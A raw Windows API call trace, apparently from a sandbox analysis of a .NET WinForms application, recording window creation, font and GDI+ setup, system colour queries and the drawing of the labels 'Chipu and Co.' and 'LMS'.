[0268.986] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="DefWindowProcW", cchWideChar=14, lpMultiByteStr=0x38ed18, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DefWindowProcWçp×NêHDþ\x80tôñ8", lpUsedDefaultChar=0x0) returned 14
[0268.987] GetProcAddress (hModule=0x76c90000, lpProcName="DefWindowProcW") returned 0x774c25dd
[0268.987] GetStockObject (i=5) returned 0x1900015
[0268.991] GetModuleHandleW (lpModuleName=0x0) returned 0xee0000
[0268.995] CoTaskMemAlloc (cb=0x5c) returned 0x76e6f8
[0268.995] RegisterClassW (lpWndClass=0x38ed08) returned 0xc107
[0268.996] CoTaskMemFree (pv=0x76e6f8)
[0268.996] GetModuleHandleW (lpModuleName=0x0) returned 0xee0000
[0268.996] CreateWindowExW (dwExStyle=0x0, lpClassName="WindowsForms10.Window.8.app.0.141b42a_r14_ad1", lpWindowName=0x0, dwStyle=0x2010000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0xfffffffd, hMenu=0x0, hInstance=0xee0000, lpParam=0x0) returned 0x20150
[0268.997] SetWindowLongW (hWnd=0x20150, nIndex=-4, dwNewLong=2001479133) returned 77531350
[0268.998] GetWindowLongW (hWnd=0x20150, nIndex=-4) returned 2001479133
[0269.005] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\.NETFramework", ulOptions=0x0, samDesired=0x20019, phkResult=0x38e61c | out: phkResult=0x38e61c*=0x230) returned 0x0
[0269.007] RegQueryValueExW (in: hKey=0x230, lpValueName="DbgJITDebugLaunchSetting", lpReserved=0x0, lpType=0x38e63c, lpData=0x0, lpcbData=0x38e638*=0x0 | out: lpType=0x38e63c*=0x0, lpData=0x0, lpcbData=0x38e638*=0x0) returned 0x2
[0269.007] RegQueryValueExW (in: hKey=0x230, lpValueName="DbgManagedDebugger", lpReserved=0x0, lpType=0x38e63c, lpData=0x0, lpcbData=0x38e638*=0x0 | out: lpType=0x38e63c*=0x0, lpData=0x0, lpcbData=0x38e638*=0x0) returned 0x2
[0269.007] RegCloseKey (hKey=0x230) returned 0x0
[0269.010] SetWindowLongW (hWnd=0x20150, nIndex=-4, dwNewLong=77531390) returned 2001479133
[0269.010] GetWindowLongW (hWnd=0x20150, nIndex=-4) returned 77531390
[0269.010] GetWindowLongW (hWnd=0x20150, nIndex=-16) returned 113311744
[0269.011] RegisterClipboardFormatW (lpszFormat="WinFormsMouseEnter") returned 0xc108
[0269.012] CallWindowProcW (lpPrevWndFunc=0x774c25dd, hWnd=0x20150, Msg=0x24, wParam=0x0, lParam=0x38e8f4) returned 0x0
[0269.012] RegisterClipboardFormatW (lpszFormat="WinFormsUnSubclass") returned 0xc109
[0269.012] CallWindowProcW (lpPrevWndFunc=0x774c25dd, hWnd=0x20150, Msg=0x81, wParam=0x0, lParam=0x38e8e8) returned 0x1
[0269.013] CallWindowProcW (lpPrevWndFunc=0x774c25dd, hWnd=0x20150, Msg=0x83, wParam=0x0, lParam=0x38e8d4) returned 0x0
[0269.013] CallWindowProcW (lpPrevWndFunc=0x774c25dd, hWnd=0x20150, Msg=0x1, wParam=0x0, lParam=0x38e8e8) returned 0x0
[0269.013] GetClientRect (in: hWnd=0x20150, lpRect=0x38e650 | out: lpRect=0x38e650) returned 1
[0269.013] GetWindowRect (in: hWnd=0x20150, lpRect=0x38e650 | out: lpRect=0x38e650) returned 1
[0269.015] GetParent (hWnd=0x20150) returned 0x0
[0269.015] DeactivateActCtx (dwFlags=0x0, ulCookie=0x16260001) returned 1
[0269.149] AdjustWindowRectEx (in: lpRect=0x38ed98, dwStyle=0x56010000, bMenu=0, dwExStyle=0x10000 | out: lpRect=0x38ed98) returned 1
[0269.152] AdjustWindowRectEx (in: lpRect=0x38eda8, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x38eda8) returned 1
[0269.153] AdjustWindowRectEx (in: lpRect=0x38eda8, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x38eda8) returned 1
[0269.154] AdjustWindowRectEx (in: lpRect=0x38eda8, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x38eda8) returned 1
[0269.155] AdjustWindowRectEx (in: lpRect=0x38eda8, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x38eda8) returned 1
[0269.156] AdjustWindowRectEx (in: lpRect=0x38eda8, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x38eda8) returned 1
[0269.157] AdjustWindowRectEx (in: lpRect=0x38ed98, dwStyle=0x56010000, bMenu=0, dwExStyle=0x10000 | out: lpRect=0x38ed98) returned 1
[0269.171] AdjustWindowRectEx (in: lpRect=0x38edac, dwStyle=0x5601008d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x38edac) returned 1
[0269.172] AdjustWindowRectEx (in: lpRect=0x38edac, dwStyle=0x5601008d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x38edac) returned 1
[0269.173] AdjustWindowRectEx (in: lpRect=0x38ed98, dwStyle=0x56010000, bMenu=0, dwExStyle=0x10000 | out: lpRect=0x38ed98) returned 1
[0269.179] GetCurrentThreadId () returned 0x730
[0269.179] GetCurrentThreadId () returned 0x730
[0269.184] GetSystemDefaultLCID () returned 0x409
[0269.184] GetStockObject (i=17) returned 0x18a0025
[0269.187] GetObjectW (in: h=0x18a0025, c=92, pv=0x38ebfc | out: pv=0x38ebfc) returned 92
[0269.188] GetDC (hWnd=0x0) returned 0x70101c6
[0269.233] GdiplusStartup (in: token=0x166018, input=0x38e1c0, output=0x38e210 | out: token=0x166018, output=0x38e210) returned 0x0
[0269.257] CoTaskMemAlloc (cb=0x5c) returned 0x76e6f8
[0269.258] GdipCreateFontFromLogfontW (hdc=0x70101c6, logfont=0x76e6f8, font=0x38ecc4) returned 0x0
[0269.471] CoTaskMemFree (pv=0x76e6f8)
[0269.473] CoTaskMemAlloc (cb=0x5c) returned 0x76e6f8
[0269.473] CoTaskMemFree (pv=0x76e6f8)
[0269.474] CoTaskMemAlloc (cb=0x5c) returned 0x76e6f8
[0269.474] CoTaskMemFree (pv=0x76e6f8)
[0269.475] GdipGetFontUnit (font=0x4e2230, unit=0x38ec8c) returned 0x0
[0269.475] GdipGetFontSize (font=0x4e2230, size=0x38ec90) returned 0x0
[0269.476] GdipGetFontStyle (font=0x4e2230, style=0x38ec88) returned 0x0
[0269.476] GdipGetFamily (font=0x4e2230, family=0x38ec84) returned 0x0
[0269.477] GdipGetFontSize (font=0x4e2230, size=0x23fdcd0) returned 0x0
[0269.478] ReleaseDC (hWnd=0x0, hDC=0x70101c6) returned 1
[0269.478] GetDC (hWnd=0x0) returned 0x70101c6
[0269.480] GdipCreateFromHDC (hdc=0x70101c6, graphics=0x38eca0) returned 0x0
[0269.482] GdipGetDpiY (graphics=0x49c9170, dpi=0x23fddac) returned 0x0
[0269.482] GdipGetFontHeight (font=0x4e2230, graphics=0x49c9170, height=0x38ec98) returned 0x0
[0269.483] GdipGetEmHeight (family=0x4ef358, style=0, EmHeight=0x38eca0) returned 0x0
[0269.483] GdipGetLineSpacing (family=0x4ef358, style=0, LineSpacing=0x38eca0) returned 0x0
[0269.484] GdipDeleteGraphics (graphics=0x49c9170) returned 0x0
[0269.484] ReleaseDC (hWnd=0x0, hDC=0x70101c6) returned 1
[0269.486] GdipCreateFont (fontFamily=0x4ef358, emSize=0x41040000, style=0, unit=0x3, font=0x23fddc8) returned 0x0
[0269.486] GdipGetFontSize (font=0x4940960, size=0x23fddcc) returned 0x0
[0269.486] GdipDeleteFont (font=0x4e2230) returned 0x0
[0269.491] GetCurrentThreadId () returned 0x730
[0269.491] GetCurrentThreadId () returned 0x730
[0269.491] GetCurrentThreadId () returned 0x730
[0269.492] GetCurrentThreadId () returned 0x730
[0269.492] GetCurrentThreadId () returned 0x730
[0269.492] GetCurrentThreadId () returned 0x730
[0269.492] GetCurrentThreadId () returned 0x730
[0269.492] GetCurrentThreadId () returned 0x730
[0269.493] AdjustWindowRectEx (in: lpRect=0x38ed38, dwStyle=0x56000000, bMenu=0, dwExStyle=0x10000 | out: lpRect=0x38ed38) returned 1
[0269.502] GetProcessWindowStation () returned 0x60
[0269.511] GetUserObjectInformationA (in: hObj=0x60, nIndex=1, pvInfo=0x23fe680, nLength=0xc, lpnLengthNeeded=0x38ec14 | out: pvInfo=0x23fe680, lpnLengthNeeded=0x38ec14) returned 1
[0269.514] SetConsoleCtrlHandler (HandlerRoutine=0x49f0926, Add=1) returned 1
[0269.514] GetModuleHandleW (lpModuleName=0x0) returned 0xee0000
[0269.515] GetModuleHandleW (lpModuleName=0x0) returned 0xee0000
[0269.518] GetClassInfoW (in: hInstance=0xee0000, lpClassName=".NET-BroadcastEventWindow.4.0.0.0.141b42a.0", lpWndClass=0x23fe6e4 | out: lpWndClass=0x23fe6e4) returned 0
[0269.521] CoTaskMemAlloc (cb=0x58) returned 0x78cdc0
[0269.521] RegisterClassW (lpWndClass=0x38eb64) returned 0xc10b
[0269.521] CoTaskMemFree (pv=0x78cdc0)
[0269.523] CreateWindowExW (dwExStyle=0x0, lpClassName=".NET-BroadcastEventWindow.4.0.0.0.141b42a.0", lpWindowName=".NET-BroadcastEventWindow.4.0.0.0.141b42a.0", dwStyle=0x80000000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0xee0000, lpParam=0x0) returned 0x10158
[0269.523] NtdllDefWindowProc_W () returned 0x1
[0269.524] NtdllDefWindowProc_W () returned 0x0
[0269.524] NtdllDefWindowProc_W () returned 0x0
[0269.524] NtdllDefWindowProc_W () returned 0x0
[0269.524] NtdllDefWindowProc_W () returned 0x0
[0269.528] GetSysColor (nIndex=10) returned 0xb4b4b4
[0269.528] GetSysColor (nIndex=2) returned 0xd1b499
[0269.528] GetSysColor (nIndex=9) returned 0x0
[0269.529] GetSysColor (nIndex=12) returned 0xababab
[0269.529] GetSysColor (nIndex=15) returned 0xf0f0f0
[0269.529] GetSysColor (nIndex=20) returned 0xffffff
[0269.529] GetSysColor (nIndex=16) returned 0xa0a0a0
[0269.529] GetSysColor (nIndex=15) returned 0xf0f0f0
[0269.529] GetSysColor (nIndex=16) returned 0xa0a0a0
[0269.529] GetSysColor (nIndex=21) returned 0x696969
[0269.529] GetSysColor (nIndex=22) returned 0xe3e3e3
[0269.529] GetSysColor (nIndex=20) returned 0xffffff
[0269.529] GetSysColor (nIndex=18) returned 0x0
[0269.529] GetSysColor (nIndex=1) returned 0x0
[0269.529] GetSysColor (nIndex=27) returned 0xead1b9
[0269.529] GetSysColor (nIndex=28) returned 0xf2e4d7
[0269.529] GetSysColor (nIndex=17) returned 0x6d6d6d
[0269.529] GetSysColor (nIndex=13) returned 0xff9933
[0269.529] GetSysColor (nIndex=14) returned 0xffffff
[0269.529] GetSysColor (nIndex=26) returned 0xcc6600
[0269.529] GetSysColor (nIndex=11) returned 0xfcf7f4
[0269.530] GetSysColor (nIndex=3) returned 0xdbcdbf
[0269.530] GetSysColor (nIndex=19) returned 0x544e43
[0269.530] GetSysColor (nIndex=24) returned 0xe1ffff
[0269.530] GetSysColor (nIndex=23) returned 0x0
[0269.530] GetSysColor (nIndex=4) returned 0xf0f0f0
[0269.530] GetSysColor (nIndex=30) returned 0xf0f0f0
[0269.530] GetSysColor (nIndex=29) returned 0xff9933
[0269.530] GetSysColor (nIndex=7) returned 0x0
[0269.530] GetSysColor (nIndex=0) returned 0xc8c8c8
[0269.530] GetSysColor (nIndex=5) returned 0xffffff
[0269.530] GetSysColor (nIndex=6) returned 0x646464
[0269.530] GetSysColor (nIndex=8) returned 0x0
[0269.530] AdjustWindowRectEx (in: lpRect=0x38ed38, dwStyle=0x56000000, bMenu=0, dwExStyle=0x10000 | out: lpRect=0x38ed38) returned 1
[0269.533] AdjustWindowRectEx (in: lpRect=0x38ed38, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x38ed38) returned 1
[0269.533] AdjustWindowRectEx (in: lpRect=0x38ed38, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x38ed38) returned 1
[0269.538] AdjustWindowRectEx (in: lpRect=0x38ed38, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x38ed38) returned 1
[0269.538] AdjustWindowRectEx (in: lpRect=0x38ed38, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x38ed38) returned 1
[0269.538] AdjustWindowRectEx (in: lpRect=0x38ed38, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x38ed38) returned 1
[0269.538] AdjustWindowRectEx (in: lpRect=0x38ed38, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x38ed38) returned 1
[0269.539] AdjustWindowRectEx (in: lpRect=0x38ed38, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x38ed38) returned 1
[0269.539] AdjustWindowRectEx (in: lpRect=0x38ed38, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x38ed38) returned 1
[0269.539] AdjustWindowRectEx (in: lpRect=0x38ed38, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x38ed38) returned 1
[0269.539] AdjustWindowRectEx (in: lpRect=0x38ed38, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x38ed38) returned 1
[0269.540] GetCurrentThreadId () returned 0x730
[0269.540] GetCurrentThreadId () returned 0x730
[0269.540] GetCurrentThreadId () returned 0x730
[0269.540] GetCurrentThreadId () returned 0x730
[0269.540] AdjustWindowRectEx (in: lpRect=0x38ed38, dwStyle=0x56000000, bMenu=0, dwExStyle=0x10000 | out: lpRect=0x38ed38) returned 1
[0269.540] AdjustWindowRectEx (in: lpRect=0x38ed38, dwStyle=0x56000000, bMenu=0, dwExStyle=0x10000 | out: lpRect=0x38ed38) returned 1
[0269.543] AdjustWindowRectEx (in: lpRect=0x38ebe8, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x38ebe8) returned 1
[0269.544] GdipGetFamilyName (in: family=0x4ef358, name=0x38ebb0, language=0x409 | out: name="Microsoft Sans Serif") returned 0x0
[0269.546] CreateCompatibleDC (hdc=0x0) returned 0x2901022d
[0269.547] GetCurrentObject (hdc=0x2901022d, type=0x1) returned 0x1b00017
[0269.547] GetCurrentObject (hdc=0x2901022d, type=0x2) returned 0x1900010
[0269.547] GetCurrentObject (hdc=0x2901022d, type=0x7) returned 0x185000f
[0269.548] GetCurrentObject (hdc=0x2901022d, type=0x6) returned 0x18a002e
[0269.550] SaveDC (hdc=0x2901022d) returned 1
[0269.551] GetDeviceCaps (hdc=0x2901022d, index=90) returned 96
[0269.553] CoTaskMemAlloc (cb=0x5c) returned 0x76e6f8
[0269.553] CreateFontIndirectW (lplf=0x76e6f8) returned 0x1f0a0217
[0269.554] CoTaskMemFree (pv=0x76e6f8)
[0269.554] GetObjectW (in: h=0x1f0a0217, c=92, pv=0x38eb74 | out: pv=0x38eb74) returned 92
[0269.559] GetCurrentObject (hdc=0x2901022d, type=0x6) returned 0x18a002e
[0269.559] GetObjectW (in: h=0x18a002e, c=92, pv=0x38eb64 | out: pv=0x38eb64) returned 92
[0269.560] SelectObject (hdc=0x2901022d, h=0x1f0a0217) returned 0x18a002e
[0269.563] GetTextExtentPoint32W (in: hdc=0x2901022d, lpString="0", c=1, psizl=0x23ff85c | out: psizl=0x23ff85c) returned 1
[0269.569] AdjustWindowRectEx (in: lpRect=0x38ecc0, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x38ecc0) returned 1
[0269.571] GdipCreateFontFamilyFromName (name="Arial", fontCollection=0x0, fontFamily=0x38ed88) returned 0x0
[0269.572] GdipCreateFont (fontFamily=0x48fb598, emSize=0x417c0000, style=1, unit=0x3, font=0x23ff950) returned 0x0
[0269.656] GdipGetFontSize (font=0x4e2230, size=0x23ff954) returned 0x0
[0269.657] AdjustWindowRectEx (in: lpRect=0x38eba0, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x38eba0) returned 1
[0269.657] GdipGetFamilyName (in: family=0x48fb598, name=0x38eb68, language=0x409 | out: name="Arial") returned 0x0
[0269.669] GetDeviceCaps (hdc=0x2901022d, index=90) returned 96
[0269.669] CoTaskMemAlloc (cb=0x5c) returned 0x76e6f8
[0269.669] CreateFontIndirectW (lplf=0x76e6f8) returned 0x200a0240
[0269.669] CoTaskMemFree (pv=0x76e6f8)
[0269.669] GetObjectW (in: h=0x200a0240, c=92, pv=0x38eb2c | out: pv=0x38eb2c) returned 92
[0269.669] SelectObject (hdc=0x2901022d, h=0x200a0240) returned 0x1f0a0217
[0269.674] DeleteObject (ho=0x1f0a0217) returned 1
[0269.674] GetTextExtentPoint32W (in: hdc=0x2901022d, lpString="0", c=1, psizl=0x23ffc04 | out: psizl=0x23ffc04) returned 1
[0269.678] AdjustWindowRectEx (in: lpRect=0x38ec78, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x38ec78) returned 1
[0269.678] AdjustWindowRectEx (in: lpRect=0x38ebd4, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x38ebd4) returned 1
[0269.678] GdipGetFamilyName (in: family=0x48fb598, name=0x38eb9c, language=0x409 | out: name="Arial") returned 0x0
[0269.679] GetDeviceCaps (hdc=0x2901022d, index=90) returned 96
[0269.679] CoTaskMemAlloc (cb=0x5c) returned 0x76e6f8
[0269.679] CreateFontIndirectW (lplf=0x76e6f8) returned 0x200a0217
[0269.679] CoTaskMemFree (pv=0x76e6f8)
[0269.679] GetObjectW (in: h=0x200a0217, c=92, pv=0x38eb60 | out: pv=0x38eb60) returned 92
[0269.681] GetTextExtentPoint32W (in: hdc=0x2901022d, lpString="0", c=1, psizl=0x23ffdfc | out: psizl=0x23ffdfc) returned 1
[0269.682] DeleteObject (ho=0x200a0217) returned 1
[0269.682] AdjustWindowRectEx (in: lpRect=0x38ed0c, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x38ed0c) returned 1
[0269.682] AdjustWindowRectEx (in: lpRect=0x38ebd4, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x38ebd4) returned 1
[0269.682] GdipGetFamilyName (in: family=0x48fb598, name=0x38eb9c, language=0x409 | out: name="Arial") returned 0x0
[0269.682] GetDeviceCaps (hdc=0x2901022d, index=90) returned 96
[0269.682] CoTaskMemAlloc (cb=0x5c) returned 0x76e6f8
[0269.682] CreateFontIndirectW (lplf=0x76e6f8) returned 0x210a0217
[0269.683] CoTaskMemFree (pv=0x76e6f8)
[0269.683] GetObjectW (in: h=0x210a0217, c=92, pv=0x38eb60 | out: pv=0x38eb60) returned 92
[0269.683] GetTextExtentPoint32W (in: hdc=0x2901022d, lpString="0", c=1, psizl=0x23ffffc | out: psizl=0x23ffffc) returned 1
[0269.683] DeleteObject (ho=0x210a0217) returned 1
[0269.684] AdjustWindowRectEx (in: lpRect=0x38ebac, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x38ebac) returned 1
[0269.689] GdipGetFamilyName (in: family=0x48fb598, name=0x38ea98, language=0x409 | out: name="Arial") returned 0x0
[0269.690] GetDeviceCaps (hdc=0x2901022d, index=90) returned 96
[0269.690] CoTaskMemAlloc (cb=0x5c) returned 0x76e6f8
[0269.690] CreateFontIndirectW (lplf=0x76e6f8) returned 0x220a0217
[0269.690] CoTaskMemFree (pv=0x76e6f8)
[0269.690] GetObjectW (in: h=0x220a0217, c=92, pv=0x38ea5c | out: pv=0x38ea5c) returned 92
[0269.692] GetMapMode (hdc=0x2901022d) returned 1
[0269.693] GetTextMetricsW (in: hdc=0x2901022d, lptm=0x38ea8c | out: lptm=0x38ea8c) returned 1
[0269.694] DrawTextExW (in: hdc=0x2901022d, lpchText="Chipu and Co.", cchText=13, lprc=0x38eb98, format=0x2400, lpdtp=0x24002a0 | out: lpchText="Chipu and Co.", lprc=0x38eb98) returned 24
[0269.742] AdjustWindowRectEx (in: lpRect=0x38ec84, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x38ec84) returned 1
[0269.764] AdjustWindowRectEx (in: lpRect=0x38ebe8, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x38ebe8) returned 1
[0269.764] GdipGetFamilyName (in: family=0x4ef358, name=0x38ebb0, language=0x409 | out: name="Microsoft Sans Serif") returned 0x0
[0269.764] GetDeviceCaps (hdc=0x2901022d, index=90) returned 96
[0269.764] CoTaskMemAlloc (cb=0x5c) returned 0x76e6f8
[0269.764] CreateFontIndirectW (lplf=0x76e6f8) returned 0x1d0a021d
[0269.764] CoTaskMemFree (pv=0x76e6f8)
[0269.764] GetObjectW (in: h=0x1d0a021d, c=92, pv=0x38eb74 | out: pv=0x38eb74) returned 92
[0269.764] SelectObject (hdc=0x2901022d, h=0x1d0a021d) returned 0x200a0240
[0269.765] DeleteObject (ho=0x200a0240) returned 1
[0269.765] GetTextExtentPoint32W (in: hdc=0x2901022d, lpString="0", c=1, psizl=0x2401544 | out: psizl=0x2401544) returned 1
[0269.765] AdjustWindowRectEx (in: lpRect=0x38ecc0, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x38ecc0) returned 1
[0269.765] GdipCreateFontFamilyFromName (name="Arial", fontCollection=0x0, fontFamily=0x38ed88) returned 0x0
[0269.766] GdipCreateFont (fontFamily=0x48fb598, emSize=0x417c0000, style=1, unit=0x3, font=0x2401664) returned 0x0
[0269.766] GdipGetFontSize (font=0x49402b8, size=0x2401668) returned 0x0
[0269.766] AdjustWindowRectEx (in: lpRect=0x38eba0, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x38eba0) returned 1
[0269.766] GdipGetFamilyName (in: family=0x48fb598, name=0x38eb68, language=0x409 | out: name="Arial") returned 0x0
[0269.766] GetDeviceCaps (hdc=0x2901022d, index=90) returned 96
[0269.766] CoTaskMemAlloc (cb=0x5c) returned 0x76e6f8
[0269.767] CreateFontIndirectW (lplf=0x76e6f8) returned 0x210a0240
[0269.767] CoTaskMemFree (pv=0x76e6f8)
[0269.767] GetObjectW (in: h=0x210a0240, c=92, pv=0x38eb2c | out: pv=0x38eb2c) returned 92
[0269.767] SelectObject (hdc=0x2901022d, h=0x210a0240) returned 0x1d0a021d
[0269.767] DeleteObject (ho=0x1d0a021d) returned 1
[0269.767] GetTextExtentPoint32W (in: hdc=0x2901022d, lpString="0", c=1, psizl=0x24018d0 | out: psizl=0x24018d0) returned 1
[0269.767] AdjustWindowRectEx (in: lpRect=0x38ec78, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x38ec78) returned 1
[0269.767] AdjustWindowRectEx (in: lpRect=0x38ebd4, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x38ebd4) returned 1
[0269.767] GdipGetFamilyName (in: family=0x48fb598, name=0x38eb9c, language=0x409 | out: name="Arial") returned 0x0
[0269.768] GetDeviceCaps (hdc=0x2901022d, index=90) returned 96
[0269.768] CoTaskMemAlloc (cb=0x5c) returned 0x76e6f8
[0269.768] CreateFontIndirectW (lplf=0x76e6f8) returned 0x1e0a021d
[0269.768] CoTaskMemFree (pv=0x76e6f8)
[0269.768] GetObjectW (in: h=0x1e0a021d, c=92, pv=0x38eb60 | out: pv=0x38eb60) returned 92
[0269.768] GetTextExtentPoint32W (in: hdc=0x2901022d, lpString="0", c=1, psizl=0x2401ac8 | out: psizl=0x2401ac8) returned 1
[0269.768] DeleteObject (ho=0x1e0a021d) returned 1
[0269.768] AdjustWindowRectEx (in: lpRect=0x38ed0c, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x38ed0c) returned 1
[0269.769] AdjustWindowRectEx (in: lpRect=0x38ebd4, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x38ebd4) returned 1
[0269.769] GdipGetFamilyName (in: family=0x48fb598, name=0x38eb9c, language=0x409 | out: name="Arial") returned 0x0
[0269.769] GetDeviceCaps (hdc=0x2901022d, index=90) returned 96
[0269.769] CoTaskMemAlloc (cb=0x5c) returned 0x76e6f8
[0269.769] CreateFontIndirectW (lplf=0x76e6f8) returned 0x1f0a021d
[0269.769] CoTaskMemFree (pv=0x76e6f8)
[0269.769] GetObjectW (in: h=0x1f0a021d, c=92, pv=0x38eb60 | out: pv=0x38eb60) returned 92
[0269.769] GetTextExtentPoint32W (in: hdc=0x2901022d, lpString="0", c=1, psizl=0x2401cbc | out: psizl=0x2401cbc) returned 1
[0269.769] DeleteObject (ho=0x1f0a021d) returned 1
[0269.769] AdjustWindowRectEx (in: lpRect=0x38ebac, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x38ebac) returned 1
[0269.770] DrawTextExW (in: hdc=0x2901022d, lpchText="LMS", cchText=3, lprc=0x38eb98, format=0x2400, lpdtp=0x2401d48 | out: lpchText="LMS", lprc=0x38eb98) returned 24
[0269.770] AdjustWindowRectEx (in: lpRect=0x38ec84, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x38ec84) returned 1
[0269.770] AdjustWindowRectEx (in: lpRect=0x38ed38, dwStyle=0x56000000, bMenu=0, dwExStyle=0x10000 | out: lpRect=0x38ed38) returned 1
[0269.770] AdjustWindowRectEx (in: lpRect=0x38ed38, dwStyle=0x56000000, bMenu=0, dwExStyle=0x10000 | out: lpRect=0x38ed38) returned 1
[0269.772] AdjustWindowRectEx (in: lpRect=0x38ed6c, dwStyle=0x2cf0000, bMenu=0, dwExStyle=0x50000 | out: lpRect=0x38ed6c) returned 1
[0269.772] GetSystemMetrics (nIndex=59) returned 1460
[0269.772] GetSystemMetrics (nIndex=60) returned 920
[0269.772] GetSystemMetrics (nIndex=34) returned 132
[0269.772] GetSystemMetrics (nIndex=35) returned 38
[0269.772] AdjustWindowRectEx (in: lpRect=0x38ec6c, dwStyle=0x2cf0000, bMenu=0, dwExStyle=0x50000 | out: lpRect=0x38ec6c) returned 1
[0269.772] GetCurrentThreadId () returned 0x730
[0269.772] GetCurrentThreadId () returned 0x730
[0269.773] GetCurrentThreadId () returned 0x730
[0269.773] GetCurrentThreadId () returned 0x730
[0269.773] GetCurrentThreadId () returned 0x730
[0269.773] GetCurrentThreadId () returned 0x730
[0269.776] CreateCompatibleDC (hdc=0x0) returned 0x2001021d
[0269.777] GetDC (hWnd=0x0) returned 0x70101c6
[0269.777] GdipCreateFromHDC (hdc=0x70101c6, graphics=0x38eba8) returned 0x0
[0269.778] CoTaskMemAlloc (cb=0x5c) returned 0x76e6f8
[0269.778] GdipGetLogFontW (font=0x4940960, graphics=0x4f83340, logfontW=0x76e6f8) returned 0x0
[0269.778] CoTaskMemFree (pv=0x76e6f8)
[0269.778] CoTaskMemAlloc (cb=0x5c) returned 0x76e6f8
[0269.778] CoTaskMemFree (pv=0x76e6f8)
[0269.779] CoTaskMemAlloc (cb=0x5c) returned 0x76e6f8
[0269.779] CoTaskMemFree (pv=0x76e6f8)
[0269.779] GdipDeleteGraphics (graphics=0x4f83340) returned 0x0
[0269.779] ReleaseDC (hWnd=0x0, hDC=0x70101c6) returned 1
[0269.779] CoTaskMemAlloc (cb=0x5c) returned 0x76e6f8
[0269.779] CreateFontIndirectW (lplf=0x76e6f8) returned 0x140a0215
[0269.779] CoTaskMemFree (pv=0x76e6f8)
[0269.780] SelectObject (hdc=0x2001021d, h=0x140a0215) returned 0x18a002e
[0269.780] GetTextMetricsW (in: hdc=0x2001021d, lptm=0x38ecb4 | out: lptm=0x38ecb4) returned 1
[0269.780] GetTextExtentPoint32W (in: hdc=0x2001021d, lpString="abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ", c=52, psizl=0x2402214 | out: psizl=0x2402214) returned 1
[0269.780] SelectObject (hdc=0x2001021d, h=0x18a002e) returned 0x140a0215
[0269.781] DeleteDC (hdc=0x2001021d) returned 1
[0269.781] AdjustWindowRectEx (in: lpRect=0x38ec94, dwStyle=0x56000000, bMenu=0, dwExStyle=0x10000 | out: lpRect=0x38ec94) returned 1
[0269.781] AdjustWindowRectEx (in: lpRect=0x38eaf8, dwStyle=0x56000000, bMenu=0, dwExStyle=0x10000 | out: lpRect=0x38eaf8) returned 1
[0269.781] AdjustWindowRectEx (in: lpRect=0x38ec58, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x38ec58) returned 1
[0269.781] AdjustWindowRectEx (in: lpRect=0x38eabc, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x38eabc) returned 1
[0269.781] AdjustWindowRectEx (in: lpRect=0x38ec58, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x38ec58) returned 1
[0269.781] AdjustWindowRectEx (in: lpRect=0x38eabc, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x38eabc) returned 1
[0269.781] AdjustWindowRectEx (in: lpRect=0x38ec58, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x38ec58) returned 1
[0269.782] AdjustWindowRectEx (in: lpRect=0x38eabc, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x38eabc) returned 1
